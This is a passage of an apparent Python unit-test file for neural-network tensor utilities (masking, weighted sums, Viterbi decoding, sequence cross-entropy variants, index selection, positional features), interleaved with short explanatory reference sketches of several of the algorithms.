expected_mask = (text_field_tensors["indexer_name"]["list_tokens"].numpy() > 0).astype(
"int32"
)
assert_almost_equal(actual_mask, expected_mask)
def test_get_text_field_mask_returns_mask_key(self):
text_field_tensors = {
"indexer_name": {
"tokens": torch.LongTensor([[3, 4, 5, 0, 0], [1, 2, 0, 0, 0]]),
"mask": torch.tensor([[False, False, True]]),
}
}
assert_almost_equal(
util.get_text_field_mask(text_field_tensors).long().numpy(), [[0, 0, 1]]
)
def test_weighted_sum_works_on_simple_input(self):
batch_size = 1
sentence_length = 5
embedding_dim = 4
sentence_array = numpy.random.rand(batch_size, sentence_length, embedding_dim)
sentence_tensor = torch.from_numpy(sentence_array).float()
attention_tensor = torch.FloatTensor([[0.3, 0.4, 0.1, 0, 1.2]])
aggregated_array = util.weighted_sum(sentence_tensor, attention_tensor).data.numpy()
assert aggregated_array.shape == (batch_size, embedding_dim)
expected_array = (
0.3 * sentence_array[0, 0]
+ 0.4 * sentence_array[0, 1]
+ 0.1 * sentence_array[0, 2]
+ 0.0 * sentence_array[0, 3]
+ 1.2 * sentence_array[0, 4]
)
numpy.testing.assert_almost_equal(aggregated_array, [expected_array], decimal=5)
def test_weighted_sum_handles_higher_order_input(self):
batch_size = 1
length_1 = 5
length_2 = 6
length_3 = 2
embedding_dim = 4
sentence_array = numpy.random.rand(batch_size, length_1, length_2, length_3, embedding_dim)
attention_array = numpy.random.rand(batch_size, length_1, length_2, length_3)
sentence_tensor = torch.from_numpy(sentence_array).float()
attention_tensor = torch.from_numpy(attention_array).float()
aggregated_array = util.weighted_sum(sentence_tensor, attention_tensor).data.numpy()
assert aggregated_array.shape == (batch_size, length_1, length_2, embedding_dim)
expected_array = (
attention_array[0, 3, 2, 0] * sentence_array[0, 3, 2, 0]
+ attention_array[0, 3, 2, 1] * sentence_array[0, 3, 2, 1]
)
numpy.testing.assert_almost_equal(aggregated_array[0, 3, 2], expected_array, decimal=5)
def test_weighted_sum_handles_uneven_higher_order_input(self):
batch_size = 1
length_1 = 5
length_2 = 6
length_3 = 2
embedding_dim = 4
sentence_array = numpy.random.rand(batch_size, length_3, embedding_dim)
attention_array = numpy.random.rand(batch_size, length_1, length_2, length_3)
sentence_tensor = torch.from_numpy(sentence_array).float()
attention_tensor = torch.from_numpy(attention_array).float()
aggregated_array = util.weighted_sum(sentence_tensor, attention_tensor).data.numpy()
assert aggregated_array.shape == (batch_size, length_1, length_2, embedding_dim)
for i in range(length_1):
for j in range(length_2):
expected_array = (
attention_array[0, i, j, 0] * sentence_array[0, 0]
+ attention_array[0, i, j, 1] * sentence_array[0, 1]
)
numpy.testing.assert_almost_equal(
aggregated_array[0, i, j], expected_array, decimal=5
)
def test_weighted_sum_handles_3d_attention_with_3d_matrix(self):
batch_size = 1
length_1 = 5
length_2 = 2
embedding_dim = 4
sentence_array = numpy.random.rand(batch_size, length_2, embedding_dim)
attention_array = numpy.random.rand(batch_size, length_1, length_2)
sentence_tensor = torch.from_numpy(sentence_array).float()
attention_tensor = torch.from_numpy(attention_array).float()
aggregated_array = util.weighted_sum(sentence_tensor, attention_tensor).data.numpy()
assert aggregated_array.shape == (batch_size, length_1, embedding_dim)
for i in range(length_1):
expected_array = (
attention_array[0, i, 0] * sentence_array[0, 0]
+ attention_array[0, i, 1] * sentence_array[0, 1]
)
numpy.testing.assert_almost_equal(aggregated_array[0, i], expected_array, decimal=5)
def test_viterbi_decode(self):
# Test Viterbi decoding is equal to greedy decoding with no pairwise potentials.
sequence_logits = torch.nn.functional.softmax(torch.rand([5, 9]), dim=-1)
transition_matrix = torch.zeros([9, 9])
indices, _ = util.viterbi_decode(sequence_logits.data, transition_matrix)
_, argmax_indices = torch.max(sequence_logits, 1)
assert indices == argmax_indices.data.squeeze().tolist()
# Test Viterbi decoding works with start and end transitions
sequence_logits = torch.nn.functional.softmax(torch.rand([5, 9]), dim=-1)
transition_matrix = torch.zeros([9, 9])
allowed_start_transitions = torch.zeros([9])
# Force start tag to be an 8
allowed_start_transitions[:8] = float("-inf")
allowed_end_transitions = torch.zeros([9])
# Force end tag to be a 0
allowed_end_transitions[1:] = float("-inf")
indices, _ = util.viterbi_decode(
sequence_logits.data,
transition_matrix,
allowed_end_transitions=allowed_end_transitions,
allowed_start_transitions=allowed_start_transitions,
)
assert indices[0] == 8
assert indices[-1] == 0
# Test that pairwise potentials affect the sequence correctly and that
# viterbi_decode can handle -inf values.
sequence_logits = torch.FloatTensor(
[
[0, 0, 0, 3, 5],
[0, 0, 0, 3, 4],
[0, 0, 0, 3, 4],
[0, 0, 0, 3, 4],
[0, 0, 0, 3, 4],
[0, 0, 0, 3, 4],
]
)
# The same tags shouldn't appear sequentially.
transition_matrix = torch.zeros([5, 5])
for i in range(5):
transition_matrix[i, i] = float("-inf")
indices, _ = util.viterbi_decode(sequence_logits, transition_matrix)
assert indices == [4, 3, 4, 3, 4, 3]
# Test that unbalanced pairwise potentials break ties
# between paths with equal unary potentials.
sequence_logits = torch.FloatTensor(
[
[0, 0, 0, 4, 4],
[0, 0, 0, 4, 4],
[0, 0, 0, 4, 4],
[0, 0, 0, 4, 4],
[0, 0, 0, 4, 4],
[0, 0, 0, 4, 4],
]
)
# The 5th tag has a penalty for appearing sequentially
# or for transitioning to/from the 4th tag, making the path
# that takes the 4th tag at every step uniquely optimal.
transition_matrix = torch.zeros([5, 5])
transition_matrix[4, 4] = -10
transition_matrix[4, 3] = -10
transition_matrix[3, 4] = -10
indices, _ = util.viterbi_decode(sequence_logits, transition_matrix)
assert indices == [3, 3, 3, 3, 3, 3]
sequence_logits = torch.FloatTensor([[1, 0, 0, 4], [1, 0, 6, 2], [0, 3, 0, 4]])
# Best path would normally be [3, 2, 3] but we add a
# potential from 2 -> 1, making [3, 2, 1] the best path.
transition_matrix = torch.zeros([4, 4])
transition_matrix[0, 0] = 1
transition_matrix[2, 1] = 5
indices, value = util.viterbi_decode(sequence_logits, transition_matrix)
assert indices == [3, 2, 1]
assert value.numpy() == 18
# Test that providing evidence results in paths containing specified tags.
sequence_logits = torch.FloatTensor(
[
[0, 0, 0, 7, 7],
[0, 0, 0, 7, 7],
[0, 0, 0, 7, 7],
[0, 0, 0, 7, 7],
[0, 0, 0, 7, 7],
[0, 0, 0, 7, 7],
]
)
# The 5th tag has a penalty for appearing sequentially
# or for transitioning to/from the 4th tag, so without evidence the best
# path would take the 4th tag at every step.
transition_matrix = torch.zeros([5, 5])
transition_matrix[4, 4] = -10
transition_matrix[4, 3] = -2
transition_matrix[3, 4] = -2
# The 1st, 4th and 5th sequence elements are observed - they should be
# equal to 2, 0 and 4. The last tag should be equal to 3, because although
# the penalty for transitioning to the 4th tag is -2, the unary potential
# is 7, which is greater than the combination for any of the other labels.
observations = [2, -1, -1, 0, 4, -1]
indices, _ = util.viterbi_decode(sequence_logits, transition_matrix, observations)
assert indices == [2, 3, 3, 0, 4, 3]
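# A minimal, hypothetical reference implementation of first-order Viterbi
# decoding, mirroring the (tag_sequence, transition_matrix) convention used
# above; util.viterbi_decode itself additionally supports observations,
# top-k, and start/end transitions.

```python
import torch

def simple_viterbi(tag_sequence: torch.Tensor, transitions: torch.Tensor):
    seq_len, num_tags = tag_sequence.shape
    score = tag_sequence[0]  # best score of any path ending in each tag
    backpointers = []
    for t in range(1, seq_len):
        # broadcast[i, j] = score[i] + transitions[i, j] + emission[j];
        # maximise over the previous tag i for each current tag j.
        broadcast = score.unsqueeze(1) + transitions + tag_sequence[t].unsqueeze(0)
        score, best_prev = broadcast.max(0)
        backpointers.append(best_prev)
    best_score, last_tag = score.max(0)
    path = [last_tag.item()]
    for best_prev in reversed(backpointers):
        path.append(best_prev[path[-1]].item())
    path.reverse()
    return path, best_score

logits = torch.FloatTensor([[1, 0, 0, 4], [1, 0, 6, 2], [0, 3, 0, 4]])
transitions = torch.zeros([4, 4])
transitions[0, 0] = 1
transitions[2, 1] = 5
path, score = simple_viterbi(logits, transitions)
# Matches the assertion above: path [3, 2, 1] with score 18.
```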
def test_viterbi_decode_top_k(self):
# Test cases taken from: https://gist.github.com/PetrochukM/afaa3613a99a8e7213d2efdd02ae4762
# Test Viterbi decoding is equal to greedy decoding with no pairwise potentials.
sequence_logits = torch.rand([5, 9])
transition_matrix = torch.zeros([9, 9])
indices, _ = util.viterbi_decode(sequence_logits.data, transition_matrix, top_k=5)
_, argmax_indices = torch.max(sequence_logits, 1)
assert indices[0] == argmax_indices.data.squeeze().tolist()
# Test that pairwise potentials affect the sequence correctly and that
# viterbi_decode can handle -inf values.
sequence_logits = torch.FloatTensor(
[
[0, 0, 0, 3, 4],
[0, 0, 0, 3, 4],
[0, 0, 0, 3, 4],
[0, 0, 0, 3, 4],
[0, 0, 0, 3, 4],
[0, 0, 0, 3, 4],
]
)
# The same tags shouldn't appear sequentially.
transition_matrix = torch.zeros([5, 5])
for i in range(5):
transition_matrix[i, i] = float("-inf")
indices, _ = util.viterbi_decode(sequence_logits, transition_matrix, top_k=5)
assert indices[0] == [3, 4, 3, 4, 3, 4]
# Test that unbalanced pairwise potentials break ties
# between paths with equal unary potentials.
sequence_logits = torch.FloatTensor(
[
[0, 0, 0, 4, 4],
[0, 0, 0, 4, 4],
[0, 0, 0, 4, 4],
[0, 0, 0, 4, 4],
[0, 0, 0, 4, 4],
[0, 0, 0, 4, 0],
]
)
# The 5th tag has a penalty for appearing sequentially
# or for transitioning to the 4th tag, making the path
# that takes the 4th tag at every step uniquely optimal.
transition_matrix = torch.zeros([5, 5])
transition_matrix[4, 4] = -10
transition_matrix[4, 3] = -10
indices, _ = util.viterbi_decode(sequence_logits, transition_matrix, top_k=5)
assert indices[0] == [3, 3, 3, 3, 3, 3]
sequence_logits = torch.FloatTensor([[1, 0, 0, 4], [1, 0, 6, 2], [0, 3, 0, 4]])
# Best path would normally be [3, 2, 3] but we add a
# potential from 2 -> 1, making [3, 2, 1] the best path.
transition_matrix = torch.zeros([4, 4])
transition_matrix[0, 0] = 1
transition_matrix[2, 1] = 5
indices, value = util.viterbi_decode(sequence_logits, transition_matrix, top_k=5)
assert indices[0] == [3, 2, 1]
assert value[0] == 18
def _brute_decode(
tag_sequence: torch.Tensor, transition_matrix: torch.Tensor, top_k: int = 5
) -> Any:
"""
Top-k decoder that uses brute-force search instead of the Viterbi dynamic programming algorithm.
"""
# Create all possible sequences
sequences = [[]] # type: ignore
for i in range(len(tag_sequence)):
new_sequences = [] # type: ignore
for j in range(len(tag_sequence[i])):
for sequence in sequences:
new_sequences.append(sequence[:] + [j])
sequences = new_sequences
# Score
scored_sequences = [] # type: ignore
for sequence in sequences:
emission_score = sum(tag_sequence[i, j] for i, j in enumerate(sequence))
transition_score = sum(
transition_matrix[sequence[i - 1], sequence[i]] for i in range(1, len(sequence))
)
score = emission_score + transition_score
scored_sequences.append((score, sequence))
# Get the top k scores / paths
top_k_sequences = sorted(scored_sequences, key=lambda r: r[0], reverse=True)[:top_k]
scores, paths = zip(*top_k_sequences)
return paths, scores # type: ignore
# Run 100 trials with randomly generated parameters and compare the outputs.
for i in range(100):
num_tags = random.randint(1, 5)
seq_len = random.randint(1, 5)
k = random.randint(1, 5)
sequence_logits = torch.rand([seq_len, num_tags])
transition_matrix = torch.rand([num_tags, num_tags])
viterbi_paths_v1, viterbi_scores_v1 = util.viterbi_decode(
sequence_logits, transition_matrix, top_k=k
)
viterbi_path_brute, viterbi_score_brute = _brute_decode(
sequence_logits, transition_matrix, top_k=k
)
numpy.testing.assert_almost_equal(
list(viterbi_score_brute), viterbi_scores_v1.tolist(), decimal=3
)
numpy.testing.assert_equal(sanitize(viterbi_paths_v1), viterbi_path_brute)
def test_sequence_cross_entropy_with_logits_masks_loss_correctly(self):
# test weight masking by checking that a tensor with non-zero values in
# masked positions returns the same loss as a tensor with zeros in those
# positions.
tensor = torch.rand([5, 7, 4])
tensor[0, 3:, :] = 0
tensor[1, 4:, :] = 0
tensor[2, 2:, :] = 0
tensor[3, :, :] = 0
weights = (tensor != 0.0)[:, :, 0].long().squeeze(-1)
tensor2 = tensor.clone()
tensor2[0, 3:, :] = 2
tensor2[1, 4:, :] = 13
tensor2[2, 2:, :] = 234
tensor2[3, :, :] = 65
targets = torch.LongTensor(numpy.random.randint(0, 3, [5, 7]))
targets *= weights
loss = util.sequence_cross_entropy_with_logits(tensor, targets, weights)
loss2 = util.sequence_cross_entropy_with_logits(tensor2, targets, weights)
assert loss.data.numpy() == loss2.data.numpy()
def test_sequence_cross_entropy_with_logits_smooths_labels_correctly(self):
tensor = torch.rand([1, 3, 4])
targets = torch.LongTensor(numpy.random.randint(0, 3, [1, 3]))
weights = torch.ones([1, 3])
loss = util.sequence_cross_entropy_with_logits(
tensor, targets, weights, label_smoothing=0.1
)
correct_loss = 0.0
for prediction, label in zip(tensor.squeeze(0), targets.squeeze(0)):
prediction = torch.nn.functional.log_softmax(prediction, dim=-1)
correct_loss += prediction[label] * 0.9
# incorrect elements
correct_loss += prediction.sum() * 0.1 / 4
# Average over sequence.
correct_loss = -correct_loss / 3
numpy.testing.assert_array_almost_equal(loss.data.numpy(), correct_loss.data.numpy())
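# The arithmetic in the loop above amounts to a label-smoothed negative
# log-likelihood; a hypothetical standalone sketch (assuming the smoothing
# mass is spread uniformly over all classes, target included):

```python
import torch

def smoothed_nll(log_probs, label, smoothing=0.1):
    # The target keeps probability mass (1 - smoothing); the remaining mass
    # is spread uniformly over all classes, including the target itself.
    num_classes = log_probs.size(-1)
    return -((1 - smoothing) * log_probs[label]
             + smoothing / num_classes * log_probs.sum())

logits = torch.tensor([2.0, 0.0, 1.0, -1.0])
loss = smoothed_nll(torch.log_softmax(logits, dim=-1), label=0)
```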
def test_sequence_cross_entropy_with_logits_averages_batch_correctly(self):
# test that the batch average equals the sum of the per-row losses
# divided by the number of batch rows containing any non-padded tokens.
tensor = torch.rand([5, 7, 4])
tensor[0, 3:, :] = 0
tensor[1, 4:, :] = 0
tensor[2, 2:, :] = 0
tensor[3, :, :] = 0
weights = (tensor != 0.0)[:, :, 0].long().squeeze(-1)
targets = torch.LongTensor(numpy.random.randint(0, 3, [5, 7]))
targets *= weights
loss = util.sequence_cross_entropy_with_logits(tensor, targets, weights)
vector_loss = util.sequence_cross_entropy_with_logits(
tensor, targets, weights, average=None
)
# Batch has one completely padded row, so divide by 4.
assert loss.data.numpy() == vector_loss.sum().item() / 4
@flaky(max_runs=3, min_passes=1)
def test_sequence_cross_entropy_with_logits_averages_token_correctly(self):
# test that the token average equals the per-row losses weighted by their
# token counts and divided by the total number of non-padded tokens
tensor = torch.rand([5, 7, 4])
tensor[0, 3:, :] = 0
tensor[1, 4:, :] = 0
tensor[2, 2:, :] = 0
tensor[3, :, :] = 0
weights = (tensor != 0.0)[:, :, 0].long().squeeze(-1)
targets = torch.LongTensor(numpy.random.randint(0, 3, [5, 7]))
targets *= weights
loss = util.sequence_cross_entropy_with_logits(tensor, targets, weights, average="token")
vector_loss = util.sequence_cross_entropy_with_logits(
tensor, targets, weights, average=None
)
total_token_loss = (vector_loss * weights.float().sum(dim=-1)).sum()
average_token_loss = (total_token_loss / weights.float().sum()).detach()
assert_almost_equal(loss.detach().item(), average_token_loss.item(), decimal=5)
def test_sequence_cross_entropy_with_logits_gamma_correctly(self):
batch = 1
length = 3
classes = 4
gamma = abs(numpy.random.randn()) # [0, +inf)
tensor = torch.rand([batch, length, classes])
targets = torch.LongTensor(numpy.random.randint(0, classes, [batch, length]))
weights = torch.ones([batch, length])
loss = util.sequence_cross_entropy_with_logits(tensor, targets, weights, gamma=gamma)
correct_loss = 0.0
for logit, label in zip(tensor.squeeze(0), targets.squeeze(0)):
p = torch.nn.functional.softmax(logit, dim=-1)
pt = p[label]
ft = (1 - pt) ** gamma
correct_loss += -pt.log() * ft
# Average over sequence.
correct_loss = correct_loss / length
numpy.testing.assert_array_almost_equal(loss.data.numpy(), correct_loss.data.numpy())
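# The gamma factor verified above is the focal-loss modulation; a
# hypothetical sketch of the per-token quantity (focal_nll is illustrative,
# not part of util):

```python
import torch

def focal_nll(logits, label, gamma=2.0):
    # Standard NLL scaled by (1 - p_t) ** gamma: confident, well-classified
    # tokens (p_t near 1) are down-weighted relative to hard ones.
    pt = torch.softmax(logits, dim=-1)[label]
    return -((1 - pt) ** gamma) * pt.log()

logits = torch.tensor([2.0, 0.0, 1.0, -1.0])
```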
def test_sequence_cross_entropy_with_logits_alpha_float_correctly(self):
batch = 1
length = 3
classes = 2 # alpha float for binary class only
alpha = (
numpy.random.rand() if numpy.random.rand() > 0.5 else (1.0 - numpy.random.rand())
) # [0, 1]
tensor = torch.rand([batch, length, classes])
targets = torch.LongTensor(numpy.random.randint(0, classes, [batch, length]))
weights = torch.ones([batch, length])
loss = util.sequence_cross_entropy_with_logits(tensor, targets, weights, alpha=alpha)
correct_loss = 0.0
for logit, label in zip(tensor.squeeze(0), targets.squeeze(0)):
logp = torch.nn.functional.log_softmax(logit, dim=-1)
logpt = logp[label]
if label:
at = alpha
else:
at = 1 - alpha
correct_loss += -logpt * at
# Average over sequence.
correct_loss = correct_loss / length
numpy.testing.assert_array_almost_equal(loss.data.numpy(), correct_loss.data.numpy())
def test_sequence_cross_entropy_with_logits_alpha_single_float_correctly(self):
batch = 1
length = 3
classes = 2 # alpha float for binary class only
alpha = (
numpy.random.rand() if numpy.random.rand() > 0.5 else (1.0 - numpy.random.rand())
) # [0, 1]
alpha = torch.tensor(alpha)
tensor = torch.rand([batch, length, classes])
targets = torch.LongTensor(numpy.random.randint(0, classes, [batch, length]))
weights = torch.ones([batch, length])
loss = util.sequence_cross_entropy_with_logits(tensor, targets, weights, alpha=alpha)
correct_loss = 0.0
for logit, label in zip(tensor.squeeze(0), targets.squeeze(0)):
logp = torch.nn.functional.log_softmax(logit, dim=-1)
logpt = logp[label]
if label:
at = alpha
else:
at = 1 - alpha
correct_loss += -logpt * at
# Average over sequence.
correct_loss = correct_loss / length
numpy.testing.assert_array_almost_equal(loss.data.numpy(), correct_loss.data.numpy())
def test_sequence_cross_entropy_with_logits_alpha_list_correctly(self):
batch = 1
length = 3
classes = 4  # alpha given as a list of per-class weights
alpha = abs(numpy.random.randn(classes)) # [0, +inf)
tensor = torch.rand([batch, length, classes])
targets = torch.LongTensor(numpy.random.randint(0, classes, [batch, length]))
weights = torch.ones([batch, length])
loss = util.sequence_cross_entropy_with_logits(tensor, targets, weights, alpha=alpha)
correct_loss = 0.0
for logit, label in zip(tensor.squeeze(0), targets.squeeze(0)):
logp = torch.nn.functional.log_softmax(logit, dim=-1)
logpt = logp[label]
at = alpha[label]
correct_loss += -logpt * at
# Average over sequence.
correct_loss = correct_loss / length
numpy.testing.assert_array_almost_equal(loss.data.numpy(), correct_loss.data.numpy())
def test_replace_masked_values_replaces_masked_values_with_finite_value(self):
tensor = torch.FloatTensor([[[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]]])
mask = torch.tensor([[True, True, False]])
replaced = util.replace_masked_values(tensor, mask.unsqueeze(-1), 2).data.numpy()
assert_almost_equal(replaced, [[[1, 2, 3, 4], [5, 6, 7, 8], [2, 2, 2, 2]]])
def test_logsumexp(self):
# First a simple example where we add probabilities in log space.
tensor = torch.FloatTensor([[0.4, 0.1, 0.2]])
log_tensor = tensor.log()
log_summed = util.logsumexp(log_tensor, dim=-1, keepdim=False)
assert_almost_equal(log_summed.exp().data.numpy(), [0.7])
log_summed = util.logsumexp(log_tensor, dim=-1, keepdim=True)
assert_almost_equal(log_summed.exp().data.numpy(), [[0.7]])
# Then some more atypical examples, and making sure this will work with how we handle
# log masks.
tensor = torch.FloatTensor([[float("-inf"), 20.0]])
assert_almost_equal(util.logsumexp(tensor).data.numpy(), [20.0])
tensor = torch.FloatTensor([[-200.0, 20.0]])
assert_almost_equal(util.logsumexp(tensor).data.numpy(), [20.0])
tensor = torch.FloatTensor([[20.0, 20.0], [-200.0, 200.0]])
assert_almost_equal(util.logsumexp(tensor, dim=0).data.numpy(), [20.0, 200.0])
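# A hypothetical scalar sketch of why util.logsumexp handles the large
# magnitudes and -inf entries above: subtracting the max before
# exponentiating keeps exp() from overflowing or underflowing to all zeros.

```python
import math

def stable_logsumexp(values):
    m = max(values)
    if m == float("-inf"):  # every entry is -inf (fully masked in log space)
        return float("-inf")
    return m + math.log(sum(math.exp(v - m) for v in values))

print(stable_logsumexp([-200.0, 20.0]))         # ~20.0
print(stable_logsumexp([float("-inf"), 20.0]))  # exactly 20.0
```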
def test_flatten_and_batch_shift_indices(self):
indices = numpy.array(
[[[1, 2, 3, 4], [5, 6, 7, 8], [9, 9, 9, 9]], [[2, 1, 0, 7], [7, 7, 2, 3], [0, 0, 4, 2]]]
)
indices = torch.tensor(indices, dtype=torch.long)
shifted_indices = util.flatten_and_batch_shift_indices(indices, 10)
numpy.testing.assert_array_equal(
shifted_indices.data.numpy(),
numpy.array(
[1, 2, 3, 4, 5, 6, 7, 8, 9, 9, 9, 9, 12, 11, 10, 17, 17, 17, 12, 13, 10, 10, 14, 12]
),
)
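# A hypothetical sketch of the index arithmetic being tested: each batch
# element's indices are offset by batch_index * sequence_length so the
# result can index into a tensor flattened to (batch * sequence_length, ...).

```python
import torch

def flatten_and_shift(indices: torch.Tensor, sequence_length: int) -> torch.Tensor:
    batch_size = indices.size(0)
    offsets = torch.arange(batch_size) * sequence_length  # (batch,)
    # Reshape the offsets so they broadcast over all trailing index dims.
    for _ in range(indices.dim() - 1):
        offsets = offsets.unsqueeze(-1)
    return (indices + offsets).view(-1)

indices = torch.tensor([[1, 2], [0, 3]])
# Batch 0 keeps its indices; batch 1 is shifted by 10.
print(flatten_and_shift(indices, 10).tolist())  # [1, 2, 10, 13]
```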
def test_batched_index_select(self):
indices = numpy.array([[[1, 2], [3, 4]], [[5, 6], [7, 8]]])
# Each element is a vector of its index.
targets = torch.ones([2, 10, 3]).cumsum(1) - 1
# Make the second batch double its index so they're different.
targets[1, :, :] *= 2
indices = torch.tensor(indices, dtype=torch.long)
selected = util.batched_index_select(targets, indices)
assert list(selected.size()) == [2, 2, 2, 3]
ones = numpy.ones([3])
numpy.testing.assert_array_equal(selected[0, 0, 0, :].data.numpy(), ones)
numpy.testing.assert_array_equal(selected[0, 0, 1, :].data.numpy(), ones * 2)
numpy.testing.assert_array_equal(selected[0, 1, 0, :].data.numpy(), ones * 3)
numpy.testing.assert_array_equal(selected[0, 1, 1, :].data.numpy(), ones * 4)
numpy.testing.assert_array_equal(selected[1, 0, 0, :].data.numpy(), ones * 10)
numpy.testing.assert_array_equal(selected[1, 0, 1, :].data.numpy(), ones * 12)
numpy.testing.assert_array_equal(selected[1, 1, 0, :].data.numpy(), ones * 14)
numpy.testing.assert_array_equal(selected[1, 1, 1, :].data.numpy(), ones * 16)
indices = numpy.array([[[1, 11], [3, 4]], [[5, 6], [7, 8]]])
indices = torch.tensor(indices, dtype=torch.long)
with pytest.raises(ConfigurationError):
util.batched_index_select(targets, indices)
indices = numpy.array([[[1, -1], [3, 4]], [[5, 6], [7, 8]]])
indices = torch.tensor(indices, dtype=torch.long)
with pytest.raises(ConfigurationError):
util.batched_index_select(targets, indices)
def test_batched_span_select(self):
# Each element is a vector of its index.
targets = torch.ones([3, 12, 2]).cumsum(1) - 1
spans = torch.LongTensor(
[
[[0, 0], [1, 2], [5, 8], [10, 10]],
[[i, i] for i in range(3, -1, -1)],
[[0, 3], [1, 4], [2, 5], [10, 11]],
]
)
selected, mask = util.batched_span_select(targets, spans)
selected = torch.where(mask.unsqueeze(-1), selected, torch.empty_like(selected).fill_(-1))
numpy.testing.assert_array_equal(
selected,
[
[
[[0, 0], [-1, -1], [-1, -1], [-1, -1]],
[[2, 2], [1, 1], [-1, -1], [-1, -1]],
[[8, 8], [7, 7], [6, 6], [5, 5]],
[[10, 10], [-1, -1], [-1, -1], [-1, -1]],
],
[[[i, i], [-1, -1], [-1, -1], [-1, -1]] for i in range(3, -1, -1)],
[
[[3, 3], [2, 2], [1, 1], [0, 0]],
[[4, 4], [3, 3], [2, 2], [1, 1]],
[[5, 5], [4, 4], [3, 3], [2, 2]],
[[11, 11], [10, 10], [-1, -1], [-1, -1]],
],
],
)
def test_flattened_index_select(self):
indices = numpy.array([[1, 2], [3, 4]])
targets = torch.ones([2, 6, 3]).cumsum(1) - 1
# Make the second batch double its index so they're different.
targets[1, :, :] *= 2
indices = torch.tensor(indices, dtype=torch.long)
selected = util.flattened_index_select(targets, indices)
assert list(selected.size()) == [2, 2, 2, 3]
ones = numpy.ones([3])
numpy.testing.assert_array_equal(selected[0, 0, 0, :].data.numpy(), ones)
numpy.testing.assert_array_equal(selected[0, 0, 1, :].data.numpy(), ones * 2)
numpy.testing.assert_array_equal(selected[0, 1, 0, :].data.numpy(), ones * 3)
numpy.testing.assert_array_equal(selected[0, 1, 1, :].data.numpy(), ones * 4)
numpy.testing.assert_array_equal(selected[1, 0, 0, :].data.numpy(), ones * 2)
numpy.testing.assert_array_equal(selected[1, 0, 1, :].data.numpy(), ones * 4)
numpy.testing.assert_array_equal(selected[1, 1, 0, :].data.numpy(), ones * 6)
numpy.testing.assert_array_equal(selected[1, 1, 1, :].data.numpy(), ones * 8)
# Check we only accept 2D indices.
with pytest.raises(ConfigurationError):
util.flattened_index_select(targets, torch.ones([3, 4, 5]))
def test_bucket_values(self):
indices = torch.LongTensor([1, 2, 7, 1, 56, 900])
bucketed_distances = util.bucket_values(indices)
numpy.testing.assert_array_equal(
bucketed_distances.numpy(), numpy.array([1, 2, 5, 1, 8, 9])
)
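# A hypothetical scalar sketch of the bucketing scheme the test above
# exercises: small values map to themselves, larger values fall into
# log2-scale buckets clamped to the last bucket (assuming the defaults of 4
# identity buckets and 10 total buckets).

```python
import math

def bucket_value(x, num_identity_buckets=4, num_total_buckets=10):
    if x <= num_identity_buckets:
        return x  # identity region: the value is its own bucket
    bucket = int(math.floor(math.log(x, 2))) + num_identity_buckets - 1
    return min(bucket, num_total_buckets - 1)  # clamp to the last bucket

print([bucket_value(v) for v in [1, 2, 7, 1, 56, 900]])  # [1, 2, 5, 1, 8, 9]
```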
def test_add_sentence_boundary_token_ids_handles_2D_input(self):
tensor = torch.from_numpy(numpy.array([[1, 2, 3], [4, 5, 0]]))
mask = tensor > 0
bos = 9
eos = 10
new_tensor, new_mask = util.add_sentence_boundary_token_ids(tensor, mask, bos, eos)
expected_new_tensor = numpy.array([[9, 1, 2, 3, 10], [9, 4, 5, 10, 0]])
assert (new_tensor.data.numpy() == expected_new_tensor).all()
assert (new_mask.data.numpy() == (expected_new_tensor > 0)).all()
def test_add_sentence_boundary_token_ids_handles_3D_input(self):
tensor = torch.from_numpy(
numpy.array(
[
[[1, 2, 3, 4], [5, 5, 5, 5], [6, 8, 1, 2]],
[[4, 3, 2, 1], [8, 7, 6, 5], [0, 0, 0, 0]],
]
)
)
mask = (tensor > 0).sum(dim=-1) > 0
bos = torch.from_numpy(numpy.array([9, 9, 9, 9]))
eos = torch.from_numpy(numpy.array([10, 10, 10, 10]))
new_tensor, new_mask = util.add_sentence_boundary_token_ids(tensor, mask, bos, eos)
expected_new_tensor = numpy.array(
[
[[9, 9, 9, 9], [1, 2, 3, 4], [5, 5, 5, 5], [6, 8, 1, 2], [10, 10, 10, 10]],
[[9, 9, 9, 9], [4, 3, 2, 1], [8, 7, 6, 5], [10, 10, 10, 10], [0, 0, 0, 0]],
]
)
assert (new_tensor.data.numpy() == expected_new_tensor).all()
assert (new_mask.data.numpy() == ((expected_new_tensor > 0).sum(axis=-1) > 0)).all()
def test_remove_sentence_boundaries(self):
tensor = torch.from_numpy(numpy.random.rand(3, 5, 7))
mask = torch.from_numpy(
# The mask with two elements is to test the corner case
# of an empty sequence, so here we are removing boundaries
# from "<S> </S>"
numpy.array([[1, 1, 0, 0, 0], [1, 1, 1, 1, 1], [1, 1, 1, 1, 0]])
).bool()
new_tensor, new_mask = util.remove_sentence_boundaries(tensor, mask)
expected_new_tensor = torch.zeros(3, 3, 7)
expected_new_tensor[1, 0:3, :] = tensor[1, 1:4, :]
expected_new_tensor[2, 0:2, :] = tensor[2, 1:3, :]
assert_array_almost_equal(new_tensor.data.numpy(), expected_new_tensor.data.numpy())
expected_new_mask = torch.from_numpy(numpy.array([[0, 0, 0], [1, 1, 1], [1, 1, 0]])).bool()
assert (new_mask.data.numpy() == expected_new_mask.data.numpy()).all()
def test_add_positional_features(self):
# This is hard to test, so we check that we get the same result as the
# original tensorflow implementation:
# https://github.com/tensorflow/tensor2tensor/blob/master/tensor2tensor/layers/common_attention.py#L270
tensor2tensor_result = numpy.asarray(
[
[0.00000000e00, 0.00000000e00, 1.00000000e00, 1.00000000e00],
[8.41470957e-01, 9.99999902e-05, 5.40302277e-01, 1.00000000e00],
[9.09297407e-01, 1.99999980e-04, -4.16146845e-01, 1.00000000e00],
]
)
tensor = torch.zeros([2, 3, 4])
result = util.add_positional_features(tensor, min_timescale=1.0, max_timescale=1.0e4)
numpy.testing.assert_almost_equal(result[0].detach().cpu().numpy(), tensor2tensor_result)
numpy.testing.assert_almost_equal(result[1].detach().cpu().numpy(), tensor2tensor_result)
# Check case with odd number of dimensions.
tensor2tensor_result = numpy.asarray(
[
[
0.00000000e00,
0.00000000e00,
0.00000000e00,
1.00000000e00,
1.00000000e00,
1.00000000e00,
0.00000000e00,
],
[
8.41470957e-01,
9.99983307e-03,
9.99999902e-05,
5.40302277e-01,
9.99949992e-01,
1.00000000e00,
0.00000000e00,
],
[
9.09297407e-01,
1.99986659e-02,
1.99999980e-04,
-4.16146815e-01,
9.99800026e-01,
1.00000000e00,
0.00000000e00,
],
]
)
tensor = torch.zeros([2, 3, 7])
result = util.add_positional_features(tensor, min_timescale=1.0, max_timescale=1.0e4)
